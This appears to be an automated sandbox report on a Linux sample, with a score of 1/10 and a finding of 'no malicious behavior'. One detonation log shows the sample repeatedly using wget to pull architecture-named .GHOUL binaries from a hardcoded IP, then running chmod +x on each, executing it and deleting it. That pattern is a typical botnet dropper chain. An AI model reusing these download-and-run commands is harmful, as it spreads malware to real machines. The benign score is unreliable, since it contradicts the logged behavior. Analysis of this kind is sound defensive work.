Malware Analysis Report

2024-11-15 05:21

Sample ID 240617-e4gzfavaka
Target b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
SHA256 315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1

Threat Level: No (potentially) malicious behavior was detected

The file b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-17 04:29

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:29

Platform

debian9-mipsbe-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:29

Platform

debian9-mipsel-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:32

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

3s

Max time network

128s

Command Line

[/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118]

Signatures

N/A

Processes

/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118

[/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118]

/usr/bin/wget

[wget http://171.22.24.217/m-i.p-s.GHOUL]

/bin/chmod

[chmod +x m-i.p-s.GHOUL]

/tmp/m-i.p-s.GHOUL

[./m-i.p-s.GHOUL]

/bin/rm

[rm -rf m-i.p-s.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/m-p.s-l.GHOUL]

/bin/chmod

[chmod +x m-p.s-l.GHOUL]

/tmp/m-p.s-l.GHOUL

[./m-p.s-l.GHOUL]

/bin/rm

[rm -rf m-p.s-l.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/s-h.4-.GHOUL]

/bin/chmod

[chmod +x s-h.4-.GHOUL]

/tmp/s-h.4-.GHOUL

[./s-h.4-.GHOUL]

/bin/rm

[rm -rf s-h.4-.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/x-8.6-.GHOUL]

/bin/chmod

[chmod +x x-8.6-.GHOUL]

/tmp/x-8.6-.GHOUL

[./x-8.6-.GHOUL]

/bin/rm

[rm -rf x-8.6-.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/a-r.m-6.GHOUL]

/bin/chmod

[chmod +x a-r.m-6.GHOUL]

/tmp/a-r.m-6.GHOUL

[./a-r.m-6.GHOUL]

/bin/rm

[rm -rf a-r.m-6.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/x-3.2-.GHOUL]

/bin/chmod

[chmod +x x-3.2-.GHOUL]

/tmp/x-3.2-.GHOUL

[./x-3.2-.GHOUL]

/bin/rm

[rm -rf x-3.2-.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/a-r.m-7.GHOUL]

/bin/chmod

[chmod +x a-r.m-7.GHOUL]

/tmp/a-r.m-7.GHOUL

[./a-r.m-7.GHOUL]

/bin/rm

[rm -rf a-r.m-7.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/p-p.c-.GHOUL]

/bin/chmod

[chmod +x p-p.c-.GHOUL]

/tmp/p-p.c-.GHOUL

[./p-p.c-.GHOUL]

/bin/rm

[rm -rf p-p.c-.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/i-5.8-6.GHOUL]

/bin/chmod

[chmod +x i-5.8-6.GHOUL]

/tmp/i-5.8-6.GHOUL

[./i-5.8-6.GHOUL]

/bin/rm

[rm -rf i-5.8-6.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/m-6.8-k.GHOUL]

/bin/chmod

[chmod +x m-6.8-k.GHOUL]

/tmp/m-6.8-k.GHOUL

[./m-6.8-k.GHOUL]

/bin/rm

[rm -rf m-6.8-k.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/p-p.c-.GHOUL]

/bin/chmod

[chmod +x p-p.c-.GHOUL]

/tmp/p-p.c-.GHOUL

[./p-p.c-.GHOUL]

/bin/rm

[rm -rf p-p.c-.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/a-r.m-4.GHOUL]

/bin/chmod

[chmod +x a-r.m-4.GHOUL]

/tmp/a-r.m-4.GHOUL

[./a-r.m-4.GHOUL]

/bin/rm

[rm -rf a-r.m-4.GHOUL]

/usr/bin/wget

[wget http://171.22.24.217/a-r.m-5.GHOUL]

/bin/chmod

[chmod +x a-r.m-5.GHOUL]

/tmp/a-r.m-5.GHOUL

[./a-r.m-5.GHOUL]

/bin/rm

[rm -rf a-r.m-5.GHOUL]

Network

Country Destination Domain Proto
IR 171.22.24.217:80 171.22.24.217 tcp
N/A 224.0.0.251:5353 udp
IR 171.22.24.217:80 171.22.24.217 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
GB 195.181.164.19:443 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:32

Platform

debian9-armhf-20240611-en

Max time network

18s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp
IR 171.22.24.217:80 171.22.24.217 tcp

Files

N/A